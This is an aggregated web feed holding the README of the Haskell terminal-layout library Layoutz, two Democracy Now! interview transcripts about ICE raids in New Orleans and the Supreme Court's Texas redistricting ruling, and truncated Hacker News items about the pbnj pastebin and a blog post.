Build declarative and composable sections, trees, tables, dashboards, and interactive Elm-style TUI's.

Part of d4 • Also in: JavaScript , Scala

Features

  • Zero dependencies, use Layoutz.hs like a header file
  • Rich text formatting: alignment, underlines, padding, margins
  • Lists, trees, tables, charts, spinners...
  • ANSI colors and wide character support
  • Easily create new primitives (no component-library limitations)
  • LayoutzApp for Elm-style TUI's


TaskListDemo.hs SimpleGame.hs

Table of Contents

Installation

Add Layoutz on Hackage to your project's .cabal file:

build-depends: layoutz

All you need:

import Layoutz

Quickstart

(1/2) Static rendering - Beautiful, compositional strings:

import Layoutz

demo = layout
  [ center $ row 
      [ withStyle StyleBold $ text "Layoutz"
      , withColor ColorCyan $ underline' "ˆ" $ text "DEMO"
      ]
  , br
  , row
    [ statusCard "Users" "1.2K"
    , withBorder BorderDouble $ statusCard "API" "UP"
    , withColor ColorRed $ withBorder BorderThick $ statusCard "CPU" "23%"
    , withStyle StyleReverse $ withBorder BorderRound $ table ["Name", "Role", "Skills"] 
	[ ["Gegard", "Pugilist", ul ["Armenian", ul ["bad", ul["man"]]]]
        , ["Eve", "QA", "Testing"]
        ]
    ]
  ]

putStrLn $ render demo

(2/2) Interactive apps - Build Elm-style TUI's:

import Layoutz

data Msg = Inc | Dec

counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
  { appInit = (0, None)
  , appUpdate = \msg count -> case msg of
      Inc -> (count + 1, None)
      Dec -> (count - 1, None)
  , appSubscriptions = \_ -> onKeyPress $ \key -> case key of
      CharKey '+' -> Just Inc
      CharKey '-' -> Just Dec
      _           -> Nothing
  , appView = \count -> layout
      [ section "Counter" [text $ "Count: " <> show count]
      , ul ["Press '+' or '-'", "ESC to quit"]
      ]
  }

main = runApp counterApp

Why layoutz?

  • We have printf and full-blown TUI libraries - but there's a gap in-between
  • layoutz is a tiny, declarative DSL for structured CLI output
  • On the side, it has a little Elm-style runtime + keyhandling DSL to animate your elements, much like a flipbook...
    • But you can just use Layoutz without any of the TUI stuff

Core concepts

  • Every piece of content is an Element
  • Elements are immutable and composable - build complex layouts by combining simple elements
  • A layout arranges elements vertically :
layout [elem1, elem2, elem3]  -- Joins with "\n"

Call render on any element to get a string

The power comes from uniform composition - since everything has the Element typeclass, everything can be combined.

String Literals

With OverloadedStrings enabled, you can use string literals directly:

layout ["Hello", "World"]  -- Instead of layout [text "Hello", text "World"]

Note: When passing to functions that take polymorphic Element a parameters (like underline' , center' , pad ), use text explicitly:

underline' "=" $ text "Title"  -- Correct
underline' "=" "Title"         -- Ambiguous type error

Elements

Text

text "Simple text"
-- Or with OverloadedStrings:
"Simple text"
Simple text

Line Break

Add line breaks with br :

layout ["Line 1", br, "Line 2"]
Line 1

Line 2

Section: section

section "Config" [kv [("env", "prod")]]
section' "-" "Status" [kv [("health", "ok")]]
section'' "#" "Report" 5 [kv [("items", "42")]]
=== Config ===
env: prod

--- Status ---
health: ok

##### Report #####
items: 42

Layout (vertical): layout

layout ["First", "Second", "Third"]
First
Second
Third

Row (horizontal): row

Arrange elements side-by-side horizontally:

row ["Left", "Middle", "Right"]
Left Middle Right

Multi-line elements are aligned at the top:

row 
  [ layout ["Left", "Column"]
  , layout ["Middle", "Column"]
  , layout ["Right", "Column"]
  ]

Tight Row: tightRow

Like row , but with no spacing between elements (useful for gradients and progress bars):

tightRow [withColor ColorRed $ text "█", withColor ColorGreen $ text "█", withColor ColorBlue $ text "█"]
███

Text alignment: alignLeft , alignRight , alignCenter , justify

Align text within a specified width:

layout
  [ alignLeft 40 "Left aligned"
  , alignCenter 40 "Centered"
  , alignRight 40 "Right aligned"
  , justify 40 "This text is justified evenly"
  ]
Left aligned                            
               Centered                 
                           Right aligned
This  text  is  justified         evenly

Horizontal rule: hr

hr
hr' "~"
hr'' "-" 10
──────────────────────────────────────────────────
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----------

Vertical rule: vr

row [vr, vr' "║", vr'' "x" 5]
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║
│ ║
│ ║
│ ║
│ ║

Key-value pairs: kv

kv [("name", "Alice"), ("role", "admin")]
name: Alice
role: admin

Table: table

Tables automatically handle alignment and borders:

table ["Name", "Age", "City"] 
  [ ["Alice", "30", "New York"]
  , ["Bob", "25", ""]
  , ["Charlie", "35", "London"]
  ]
┌─────────┬─────┬─────────┐
│ Name    │ Age │ City    │
├─────────┼─────┼─────────┤
│ Alice   │ 30  │ New York│
│ Bob     │ 25  │         │
│ Charlie │ 35  │ London  │
└─────────┴─────┴─────────┘

Unordered Lists: ul

Clean unordered lists with automatic nesting:

ul ["Feature A", "Feature B", "Feature C"]
• Feature A
• Feature B
• Feature C

Nested lists with auto-styling:

ul [ "Backend"
   , ul ["API", "Database"]
   , "Frontend"
   , ul ["Components", ul ["Header", ul ["Footer"]]]
   ]
• Backend
  ◦ API
  ◦ Database
• Frontend
  ◦ Components
    ▪ Header
      • Footer

Ordered Lists: ol

Numbered lists with automatic nesting:

ol ["First step", "Second step", "Third step"]
1. First step
2. Second step
3. Third step

Nested ordered lists with automatic style cycling (numbers → letters → roman numerals):

ol [ "Setup"
   , ol ["Install dependencies", "Configure", ol ["Check version"]]
   , "Build"
   , "Deploy"
   ]
1. Setup
  a. Install dependencies
  b. Configure
    i. Check version
2. Build
3. Deploy

Underline: underline

Add underlines to any element:

underline "Important Title"
underline' "=" $ text "Custom"  -- Use text for custom underline char
Important Title
───────────────

Custom
══════

Box: box

With title:

box "Summary" [kv [("total", "42")]]
┌──Summary───┐
│ total: 42  │
└────────────┘

Without title:

box "" [kv [("total", "42")]]
┌────────────┐
│ total: 42  │
└────────────┘

Status card: statusCard

statusCard "CPU" "45%"
┌───────┐
│ CPU   │
│ 45%   │
└───────┘

Progress bar: inlineBar

inlineBar "Download" 0.75
Download [███████████████─────] 75%

Tree: tree

tree "Project" 
  [ branch "src" 
      [ leaf "main.hs"
      , leaf "test.hs"
      ]
  , branch "docs"
      [ leaf "README.md"
      ]
  ]
Project
├── src
│   ├── main.hs
│   └── test.hs
└── docs
    └── README.md

Chart: chart

chart [("Web", 10), ("Mobile", 20), ("API", 15)]
Web    │████████████████████ 10
Mobile │████████████████████████████████████████ 20
API    │██████████████████████████████ 15

Padding: pad

Add uniform padding around any element:

pad 2 $ text "content"
        
        
  content  
        
        

Spinners: spinner

Animated loading spinners for TUI apps:

spinner "Loading..." frameNum SpinnerDots
spinner "Processing" frameNum SpinnerLine
spinner "Working" frameNum SpinnerClock
spinner "Thinking" frameNum SpinnerBounce

Styles:

  • SpinnerDots - Braille dot spinner: ⠋ ⠙ ⠹ ⠸ ⠼ ⠴ ⠦ ⠧ ⠇ ⠏
  • SpinnerLine - Classic line spinner: | / - \
  • SpinnerClock - Clock face spinner: 🕐 🕑 🕒 ...
  • SpinnerBounce - Bouncing dots: ⠁ ⠂ ⠄ ⠂

Increment the frame number on each render to animate:

-- In your app state, track a frame counter
data AppState = AppState { spinnerFrame :: Int, ... }

-- In your view function
spinner "Loading" (spinnerFrame state) SpinnerDots

-- In your update function (triggered by a tick or key press)
state { spinnerFrame = spinnerFrame state + 1 }

With colors:

withColor ColorGreen $ spinner "Success!" frame SpinnerDots
withColor ColorYellow $ spinner "Warning" frame SpinnerLine

Centering: center

Smart auto-centering and manual width:

center "Auto-centered"     -- Uses layout context
center' 20 "Manual width"  -- Fixed width
        Auto-centered        

    Manual width    

Margin: margin

Add prefix margins to elements for compiler-style error messages:

margin "[error]"
  [ text "Ooops"
  , text ""
  , row [ text "result :: Int = "
        , underline' "^" $ text "getString"
        ]
  , text "Expected Int, found String"
  ]
[error] Ooops
[error]
[error] result :: Int =  getString
[error]                  ^^^^^^^^^
[error] Expected Int, found String

Border Styles

Elements like box , table , and statusCard support different border styles:

BorderNormal (default):

box "Title" ["content"]
┌──Title──┐
│ content │
└─────────┘

BorderDouble :

withBorder BorderDouble $ statusCard "API" "UP"
╔═══════╗
║ API   ║
║ UP    ║
╚═══════╝

BorderThick :

withBorder BorderThick $ table ["Name"] [["Alice"]]
┏━━━━━━━┓
┃ Name  ┃
┣━━━━━━━┫
┃ Alice ┃
┗━━━━━━━┛

BorderRound :

withBorder BorderRound $ box "Info" ["content"]
╭──Info───╮
│ content │
╰─────────╯

BorderNone (invisible borders):

withBorder BorderNone $ box "Info" ["content"]
  Info   
 content 
         

Colors (ANSI Support)

Add ANSI colors to any element:

layout[
  withColor ColorRed $ text "The quick brown fox...",
  withColor ColorBrightCyan $ text "The quick brown fox...",
  underlineColored "~" ColorRed $ text "The quick brown fox...",
  margin "[INFO]" [withColor ColorCyan $ text "The quick brown fox..."]
]

Standard Colors:

  • ColorBlack ColorRed ColorGreen ColorYellow ColorBlue ColorMagenta ColorCyan ColorWhite
  • ColorBrightBlack ColorBrightRed ColorBrightGreen ColorBrightYellow ColorBrightBlue ColorBrightMagenta ColorBrightCyan ColorBrightWhite
  • ColorNoColor (for conditional formatting)

Extended Colors:

  • ColorFull n - 256-color palette (0-255)
  • ColorTrue r g b - 24-bit RGB true color

Color Gradients

Create beautiful gradients with extended colors:

let palette   = tightRow $ map (\i -> withColor (ColorFull i) $ text "█") [16, 19..205]
    redToBlue = tightRow $ map (\i -> withColor (ColorTrue i 100 (255 - i)) $ text "█") [0, 4..255]
    greenFade = tightRow $ map (\i -> withColor (ColorTrue 0 (255 - i) i) $ text "█") [0, 4..255]
    rainbow   = tightRow $ map colorBlock [0, 4..255]
      where
        colorBlock i =
          let r = if i < 128 then i * 2 else 255
              g = if i < 128 then 255 else (255 - i) * 2
              b = if i > 128 then (i - 128) * 2 else 0
          in withColor (ColorTrue r g b) $ text "█"

putStrLn $ render $ layout [palette, redToBlue, greenFade, rainbow]

Styles (ANSI Support)

Add ANSI styles to any element:

layout[
  withStyle StyleBold $ text "The quick brown fox...",
  withColor ColorRed $ withStyle StyleBold $ text "The quick brown fox...",
  withStyle StyleReverse $ withStyle StyleItalic $ text "The quick brown fox..."
]

Styles:

  • StyleBold StyleDim StyleItalic StyleUnderline
  • StyleBlink StyleReverse StyleHidden StyleStrikethrough
  • StyleNoStyle (for conditional formatting)

Combining Styles:

Use <> to combine multiple styles at once:

layout[
  withStyle (StyleBold <> StyleItalic <> StyleUnderline) $ text "The quick brown fox...",
  withStyle (StyleBold <> StyleReverse) $ text "The quick brown fox..."
]

You can also combine colors and styles:

withColor ColorBrightYellow $ withStyle (StyleBold <> StyleItalic) $ text "The quick brown fox..."

Custom Components

Create your own components by implementing the Element typeclass

data Square = Square Int

instance Element Square where
  renderElement (Square size) 
    | size < 2 = ""
    | otherwise = intercalate "\n" (top : middle ++ [bottom])
    where
      w = size * 2 - 2
      top = "┌" ++ replicate w '─' ++ "┐"
      middle = replicate (size - 2) ("│" ++ replicate w ' ' ++ "│")
      bottom = "└" ++ replicate w '─' ++ "┘"

-- Helper to avoid wrapping with L
square :: Int -> L
square n = L (Square n)

-- Use it like any other element
putStrLn $ render $ row
  [ square 3
  , square 5
  , square 7
  ]
┌────┐ ┌────────┐ ┌────────────┐
│    │ │        │ │            │
└────┘ │        │ │            │
       │        │ │            │
       └────────┘ │            │
                  │            │
                  └────────────┘

REPL

Drop into GHCi to experiment:

cabal repl
λ> :set -XOverloadedStrings
λ> import Layoutz
λ> putStrLn $ render $ center $ box "Hello" ["World!"]
┌──Hello──┐
│ World!  │
└─────────┘
λ> putStrLn $ render $ table ["A", "B"] [["1", "2"]]
┌───┬───┐
│ A │ B │
├───┼───┤
│ 1 │ 2 │
└───┴───┘

Interactive Apps

Build Elm-style terminal applications with the built-in TUI runtime.

import Layoutz

data Msg = Inc | Dec

counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
  { appInit = (0, None)
  , appUpdate = \msg count -> case msg of
      Inc -> (count + 1, None)
      Dec -> (count - 1, None)
  , appSubscriptions = \_ -> onKeyPress $ \key -> case key of
      CharKey '+' -> Just Inc
      CharKey '-' -> Just Dec
      _           -> Nothing
  , appView = \count -> layout
      [ section "Counter" [text $ "Count: " <> show count]
      , ul ["Press '+' or '-'", "ESC to quit"]
      ]
  }

main = runApp counterApp

How the Runtime Works

The runApp function spawns three daemon threads:

  • Render thread - Continuously renders appView state to terminal (~30fps)
  • Input thread - Reads keys, maps via appSubscriptions , calls appUpdate
  • Command thread - Executes Cmd side effects async, feeds results back

As per the above, commands run without blocking the UI.

Press ESC to exit.

LayoutzApp state msg

data LayoutzApp state msg = LayoutzApp
  { appInit          :: (state, Cmd msg)                 -- Initial state + startup command
  , appUpdate        :: msg -> state -> (state, Cmd msg) -- Pure state transitions
  , appSubscriptions :: state -> Sub msg                 -- Event sources
  , appView          :: state -> L                       -- Render to UI
  }

Subscriptions

Subscription Description
onKeyPress (Key -> Maybe msg) Keyboard input
onTick msg Periodic ticks (~100ms) for animations
batch [sub1, sub2, ...] Combine subscriptions

Commands

Command Description
None No effect
Cmd (IO (Maybe msg)) Run IO, optionally produce message
Batch [cmd1, cmd2, ...] Multiple commands
cmd :: IO () -> Cmd msg Fire and forget
cmdMsg :: IO msg -> Cmd msg IO that returns a message

Example: Logger with file I/O

import Layoutz

data Msg = Log | Saved
data State = State { count :: Int, status :: String }

loggerApp :: LayoutzApp State Msg
loggerApp = LayoutzApp
  { appInit = (State 0 "Ready", None)
  , appUpdate = \msg s -> case msg of
      Log   -> (s { count = count s + 1 }, 
                cmd $ appendFile "log.txt" ("Entry " <> show (count s) <> "\n"))
      Saved -> (s { status = "Saved!" }, None)
  , appSubscriptions = \_ -> onKeyPress $ \key -> case key of
      CharKey 'l' -> Just Log
      _           -> Nothing
  , appView = \s -> layout
      [ section "Logger" [text $ "Entries: " <> show (count s)]
      , text (status s)
      , ul ["'l' to log", "ESC to quit"]
      ]
  }

main = runApp loggerApp

Key Types

CharKey Char       -- 'a', '1', ' '
EnterKey, BackspaceKey, TabKey, EscapeKey, DeleteKey
ArrowUpKey, ArrowDownKey, ArrowLeftKey, ArrowRightKey
SpecialKey String  -- "Ctrl+C", etc.

Inspiration

5,000 Arrests? ICE Descends on Louisiana to Carry Out Raids in World's "Incarceration Capital"

Democracy Now!
www.democracynow.org
2025-12-05 13:24:43
A major immigration crackdown is underway in New Orleans and the surrounding areas of Louisiana, dubbed “Operation Catahoula Crunch” by the Trump administration. According to planning documents, 250 federal agents will aim to make 5,000 arrests over two months. Homeland Security Secretar...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : This is Democracy Now! , democracynow.org, The War and Peace Report . I’m Amy Goodman.

We turn now to New Orleans and southeast Louisiana, where more than 250 federal immigration agents launched Operation Catahoula Crunch this week. They reportedly aim to make more than 5,000 arrests over two months.

Homeland Security Secretary Kristi Noem says the operation will target, quote, “the worst of the worst,” unquote. But local officials say they’re skeptical. City Councilmember Lesli Harris responded, quote, “There are nowhere near 5,000 violent offenders in our region. … What we’re seeing instead are mothers, teenagers, and workers being detained during routine check-ins, from their homes and places of work.” So far, agents have targeted the parking lots of home improvement stores like Home Depot and workers at construction sites.

At a New Orleans City Council hearing Thursday, about 30 protesters were removed after demanding city leaders do more to protect immigrants, calling for ICE -free zones. In a public comment session, residents went to the microphone one by one and were cut off when it was clear they wanted to talk about immigration, which was not on the formal agenda. This is Mich González of SouthEast Dignity Not Detention Coalition. After his mic was cut, he continued to try to be heard.

MICH GONZÁLEZ: We delivered a letter to City Council on November 21st. I’m part of the SouthEast Dignity Not Detention Coalition, and we requested a meeting. This should be on the agenda. It should be on the agenda.

CHAIR : Not germane.

MICH GONZÁLEZ: Public safety is at the heart —

Little kids are not going to school right now. People are not able to take their disabled parents to their medical appointments. … Please, I’m begging you.

PROTESTERS : Shame! Shame!

MICH GONZÁLEZ: And right now it’s about the safety of the people who live here. But I promise you, in just — these people are planning to stay here for two months and take as many as 5,000 of the people who live in this great city of New Orleans.

PROTESTERS : Shame! Shame!

MICH GONZÁLEZ: And they are the people who work here. They’re the people who clean dishes here. They’re the people who take care of the elderly in the nursing homes. … Please, I’m begging you.

AMY GOODMAN : For more, we’re joined by Homero López, legal director for ISLA , Immigrant Services and Legal Advocacy, based in New Orleans.

Welcome to Democracy Now! , Homero. If you can start off by talking about what exactly you understand this plan is? As they move in 250 immigration agents, they say they’re making 5,000 arrests in the next two months. What’s happening to New Orleans?

HOMERO LÓPEZ: Yes. Thank you, Amy, for having me on.

We have seen the officers come into the city and the surrounding areas, as well. And the fact that they’re looking for a specific quota, that they have a number that they’re going after, makes it clear that they’re not targeting, as they claim, the worst of the worst. Instead, they’re going to target whoever they can, and as the Supreme Court has unfortunately authorized them, they’re using racial profiling as part of that approach.

AMY GOODMAN : They’re calling it “Catahoula Crunch.” Louisiana’s state dog is the Catahoula. Explain what they’re saying here, what Kristi Noem is talking about, who the immigrants are that they’re going after.

HOMERO LÓPEZ: Yeah. They originally had called it the “Swamp Sweep,” but I guess they thought “SS” was a little bit too on the nose, so they went after “Catahoula Crunch” instead.

And what they’re saying is they’re going to target, you know, folks who have criminal backgrounds, or at least that’s the purported position from the higher-ups at least. There was a video of Bovino recently saying he’s going after immigrants. He was asked, “Who are you targeting? What are you — who are you looking for?” And he said, “This is an immigration raid.” And so, he’s — they’re focusing on immigrants across the board.

What we’ve seen has been folks at work, folks at their check-ins, people around schools, ICE officers setting up around or CBP officers setting up around the schools. And the fear that’s being — the fear that’s coming into the — being sowed in the community is really the true intent of what they’re — of their operation here.

AMY GOODMAN : Catahoula Crunch named after the Louisiana state dog. Didn’t Homeland Secretary Kristi Noem famously shoot her dog?

HOMERO LÓPEZ: That is a story that’s come out, yes.

AMY GOODMAN : Many ICE officials who now work at the national level came up through Louisiana. Is that right? Can you talk about them? And who are the hundreds of agents moved in to do these arrests?

HOMERO LÓPEZ: Yeah, Louisiana is playing a oversized role when it comes to immigration enforcement throughout the country. The former wildlife and fisheries secretary here in Louisiana is now one of the deputy — or, is the deputy director of ICE nationally. Our former area, New Orleans, ICE director, field office director, is also at headquarters. There are various deportation officers here from Louisiana who have gone to work at headquarters. And so, the approach that they used to take or that they have taken in Louisiana since 2014 to incarcerate as many people as possible, quickly warehouse and deport people from the state, is something that seems to be the structure that is being operated now from the national headquarters.

AMY GOODMAN : Louisiana, in other parts of the country, we know it particularly here when it comes to detention. You have Mahmoud Khalil, who is the Columbia student who was imprisoned in Louisiana. You have Rümeysa Öztürk, the Tufts graduate student who was imprisoned in Louisiana. Talk about the overall detention complex in Louisiana.

HOMERO LÓPEZ: Louisiana has a history, a terrible history, of being the incarceration capital of the world. And that is no different when it comes now to immigration detention. Louisiana is number two when it comes to the second — the state with the second-largest detained immigrant population in the country, next to Texas. However, we’re not a border state. We also don’t have a large immigrant population by numbers. Instead, what Louisiana does is it receives a lot of people who are detained around the country.

And so, the additional aspect of what happens in Louisiana is that we have these very rural, isolated detention centers in central Louisiana, central and northern Louisiana, which are very far away from major metropolitan or from major population centers, which means what you end up with is people removed from their legal and support systems. So, when you had someone like Mahmoud Khalil being moved down here from New York, what you had was removing him from his social network, from people who could assist him, from being able to provide him with assistance. Same thing with Rümeysa Öztürk. And these were highly publicized cases, places where folks had large support networks. And so, when we deal with folks who don’t have those support networks, who don’t have that publicity, who don’t have that kind of support, and you have them in such a remote, isolated area, what you end up is basically warehousing folks without giving them an opportunity to fight their case and be able to present a viable case through actual due process.

AMY GOODMAN : You can’t help but notice that New Orleans is a blue city in a red state, Louisiana. Louisiana has the most detention beds outside of Texas. Can you talk about the consent decree that was overturned last month, Homero?

HOMERO LÓPEZ: The consent decree was overturned last month by the Justice Department, and they wanted to get rid of it. It had been in place for over a decade here in Louisiana, that did not — or, here in New Orleans, that had not allowed the local sheriff’s office to cooperate with ICE .

Now the new sheriff, we don’t know exactly what she’s going to do, but what it does is it removes this tool that existed, which was originally implemented because of previous abuses, that had been determined by a federal court, that New Orleans police, New Orleans Sheriff’s Office should not be cooperating, and had ordered the sheriff’s office not to cooperate. Without that consent decree in place, it’s now up to the sheriff. And so, there is a movement on the ground from advocacy groups and from other organizers to push the sheriff to continue to have that kind of policy, but we’ll see what comes from that.

AMY GOODMAN : And can you talk about the people you represent? I mean, I think it’s really important, not only in New Orleans, but around the country. A number of the people being picked up are going to their court hearings. They are following the rules, and they end up being arrested.

HOMERO LÓPEZ: Yeah, the majority of people who are being arrested, the majority of calls that we’re receiving are from folks who have — who are going through the process, whether they be children who originally applied through the Special Immigrant Juvenile status process and are awaiting their ability to apply for residency, whether it’s spouses of U.S. citizens who are going to their interviews and are being picked up, whether it’s people who have immigration court hearings and have filed their applications and are attending the hearings, are going — again, they’re doing it, quote-unquote, “the right way.” And that’s who is being picked up. Those are the folks who are the low-hanging fruit. Those are the folks who are going to be targeted.

There’s a reason that these officers are going to worksites and not necessarily doing in-depth investigations to identify folks that they claim are a danger to the community. Instead, what they’re doing is they’re taking folks out of our community: our neighbors, our friends, our family members. And that’s who they’re detaining and they’re sending into these terrible detention centers in order to try to quickly deport them from the country.

AMY GOODMAN : Homero López, I want to thank you for being with us. Do you have a final comment on the City Council hearing that was held yesterday as mics were turned off on person after person who was calling for ICE -free zones?

HOMERO LÓPEZ: Yeah, we hope that City Council will take a stance. We understand that they don’t necessarily have a ton of power over federal actions, but the point here is about the values that the city stands for and what we are going to demonstrate to our community and to our residents of who we support, what we support and what we stand for in the city.

AMY GOODMAN : Homero López is the legal director of ISLA , the Immigration Services and Legal Advocacy, based in New Orleans, Louisiana.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Rigging Democracy: Supreme Court Approves Racial Texas Gerrymander, Handing Trump Midterm Advantage

Democracy Now!
www.democracynow.org
2025-12-05 13:14:36
The conservative majority on the U.S. Supreme Court has cleared the way for Texas to use a gerrymandered congressional map in next year’s midterm elections that a lower court found racially discriminatory. The 6-3 ruling is another political win for President Donald Trump and his allies, who h...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : A major victory for President Trump: The Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five House seats in next year’s midterms. A lower court previously ruled the redistricting map was unconstitutional because it had been racially gerrymandered and would likely dilute the political power of Black and Latino voters.

Supreme Court Justice Elena Kagan wrote in her dissent, quote, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution,” Justice Kagan wrote.

For more, we’re joined by Ari Berman, voting rights correspondent for Mother Jones magazine. His new piece is headlined “The Roberts Court Just Helped Trump Rig the Midterms.” Ari is the author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It .

Ari Berman, welcome back to Democracy Now! Talk about the significance of this Supreme Court decision yesterday. And what exactly was Samuel Alito’s role?

ARI BERMAN : Good morning, Amy, and thank you for having me back on the show.

So, the immediate effect is that Texas will now be able to use a congressional map that has already been found to be racially gerrymandered and could allow Republicans to pick up five new seats in the midterms. And remember, Texas started this whole gerrymandering arms race, where state after state is now redrawing their maps ahead of the midterms, essentially normalizing something that is deeply abnormal.

It was an unsigned majority opinion, but Samuel Alito wrote a concurrence, basically saying that the Texas map was a partisan map, pure and simple. And remember, Amy, the Supreme Court has already laid the groundwork for Texas to do this kind of thing by essentially saying that partisan gerrymandering cannot be reviewed in federal court, no matter how egregious it is. They have blocked racial gerrymandering in the past, but now, essentially, what they’re allowing to do is they’re allowing Texas to camouflage a racial gerrymander as a partisan gerrymander, and they’ve given President Trump a huge victory in his war against American democracy.

AMY GOODMAN : This overturned a lower court ruling. What are the role of the courts now, with the Supreme Court ruling again and again on this?

ARI BERMAN : Well, basically, what the Supreme Court has done is it’s given President Trump the power of a king, and it’s given itself the power of a monarchy, because what happens is lower courts keep striking down things that President Trump and his party do, including Trump appointees to the lower courts — the Texas redistricting map was struck down by a Trump appointee, who found that it was racially gerrymandered to discriminate against Black and Latino voters. What the Roberts Court did was overturn that lower court opinion, just as it’s overturned so many other lower court opinions to rule in favor of Donald Trump and his party.

And one of the most staggering things, Amy, is the fact that the Roberts Court has ruled for President Trump 90% of the time in these shadow docket cases. So, in all of these big issues, whether it’s on voting rights or immigration or presidential powers, lower courts are constraining the president, and the Supreme Court repeatedly is saying that the president and his party are essentially above the law.

AMY GOODMAN : So, you have talked about the Supreme Court in 2019 ruling in a case, ordered that courts should stay out of disputes over partisan gerrymandering. Tell us more about that.

ARI BERMAN : It was really a catastrophic ruling for democracy, because what it said is that no matter how egregiously a state gerrymanders to try to target a political party, that those claims not only can’t be struck down in federal court, they can’t even be reviewed in federal court. And what that has done is it said to the Texases of the world, “You can gerrymander as much as you want, as long as you say that you’re doing it for partisan purposes.”

So, this whole exercise made a complete mockery of democracy, because Texas goes out there and says, “We freely admit that we are drawing these districts to pick up five new Republican seats.” President Trump says, “We’re entitled to five new seats.” Now, that would strike the average American as absurd, the idea that you could just redraw maps mid-decade to give more seats to your party. But the Supreme Court has basically laid the groundwork for that to be OK.

And even though racial gerrymandering, discriminating against Black and Hispanic voters, for example, is unconstitutional, which is what the lower court found in Texas, the Roberts Court continually has allowed Republicans to get away with this kind of racial gerrymandering by allowing them to just claim that it’s partisan gerrymandering. And that’s what happened once again in Texas yesterday.

ARI BERMAN : Where does this leave the Voting Rights Act? And for people, especially young people who, you know, weren’t alive in 1965, explain what it says and its importance then.

ARI BERMAN : The Voting Rights Act is the most important piece of civil rights legislation ever passed by the Congress. It quite literally ended the Jim Crow regime in the South by getting rid of the literacy tests and the poll taxes and all the other suppressive devices that had prevented Black people from being able to register and vote in the South for so many years.

It has been repeatedly gutted by the Roberts Court, which has ruled that states with a long history of discrimination, like Texas, no longer have to approve their voting changes with the federal government. The Roberts Court has made it much harder to strike down laws that discriminate against voters of color. And now they are preparing potentially to gut protections that protect people of color from being able to elect candidates of choice.

And I think the Texas ruling is a bad sign, another bad sign, for the Voting Rights Act, because a lower court found that Texas drew these maps to discriminate against Black and Latino voters, that they specifically targeted districts where Black and Latino voters had elected their candidates of choice. And the Supreme Court said, “No, we’re OK with doing it.” So it was yet another example in which the Supreme Court is choosing to protect white power over the power of Black, Latino, Asian American voters.

AMY GOODMAN : So, where does this leave the other cases? You have California’s Prop 50 to redraw the state’s congressional districts, but that was done another way. It was done by a referendum. The people of California voted on it. And then you’ve got North Carolina. You’ve got Missouri. Where does this leave everything before next midterm elections?

ARI BERMAN : Yeah, there’s a lot of activity in the courts so far. A federal court has already upheld North Carolina’s map, which was specifically targeted to dismantle a district of a Black Democrat there. The only district they changed was held by a Black Democrat in the state. In Missouri right now, organizers are trying to get signatures for a referendum to be able to block that district, which also targeted the district of a Black Democrat, Emanuel Cleaver.

California’s law is being challenged by Republicans and by the Justice Department. The Supreme Court did signal, however, in its decision in Texas that they believe that the California map was also a partisan gerrymander, so that that would lead one to believe that if the Supreme Court is going to uphold the Texas map, they would also uphold the California map.

And we’ve also seen repeatedly that there’s double standards for this court, that they allow Republicans to get away with things that they don’t allow Democrats to get away with. They’ve allowed Trump to get away with things that they did not allow Biden to get away with. But generally speaking, it seems like the Supreme Court is going to allow states to gerrymander as much as they want. And that’s going to lead to a situation where American democracy is going to become more rigged and less fair.

AMY GOODMAN : Ari Berman, voting rights correspondent for Mother Jones magazine, author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It . We’ll link to your piece , “The Roberts Court Just Helped Trump Rig the Midterms.”

Next up, immigration crackdowns continue nationwide. We’ll go to New Orleans, where agents are expected to make 5,000 arrests, and to Minneapolis, as Trump escalates his attacks on the Somali community there, calling the whole community “garbage.” Stay with us.

[break]

AMY GOODMAN : “Ounadikom,” “I Call Out to You,” composed by Ahmad Kaabour at the outbreak of the Lebanese Civil War in 1975 and performed at a Gaza benefit concert on Wednesday by the NYC Palestinian Youth Choir.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Show HN: Pbnj – A minimal, self-hosted pastebin you can deploy in 60 seconds

Hacker News
pbnj.sh
2025-12-05 13:13:03
Comments...
Original Article
# API Reference

## Authentication

All write operations require a Bearer token:
```
Authorization: Bearer YOUR_AUTH_KEY
```

## Endpoints

### Create Paste

POST /api

#### JSON Request
```bash
curl 

05_api.md

10 hours ago

# CLI Reference

## Installation

```bash
npm install -g @pbnjs/cli
```

## Configuration

Run the setup wizard:
```bash
pbnj --init
```

This creates ~/.pbnj with your configuration:
```
PBNJ_HOST=ht

04_cli.md

10 hours ago

# Cost Breakdown

"This is deployed on Cloudflare, they might charge us eventually!"

Don't worry. Let's do the math.

## Cloudflare D1 Free Tier

- 500 MB storage
- 5 million reads/day
- 100,000 writ

03_cost.md

10 hours ago

# Deployment Guide

## One-Click Deploy (Recommended)

Click the "Deploy to Cloudflare" button on the GitHub repo — that's it!

The deploy button automatically:
- Forks the repo to your GitHub account

02_deployment.md

10 hours ago

# Welcome to pbnj

pbnj is a simple, minimal self-hosted pastebin solution.

## What is pbnj?

pbnj lets you share code snippets and text files with a simple URL.
No accounts, no bloat - just paste an

01_welcome.md

10 hours ago

# Web Interface

pbnj includes a web interface for creating and managing pastes directly from your browser.

## Authentication

The web interface uses the same `AUTH_KEY` as the CLI and API. Authentic

07_web_interface.md

9 hours ago

# Configuration

pbnj is configured through a single `pbnj.config.js` file in the project root.

## Default Configuration

```js
export default {
  name: 'pbnj',
  logo: '/logo.png',
  idStyle: 'sandw

06_configuration.md

9 hours ago

Most technical problems are people problems

Hacker News
blog.joeschrag.com
2025-12-05 13:07:59
Comments...
Original Article

Most Technical Problems Are Really People Problems

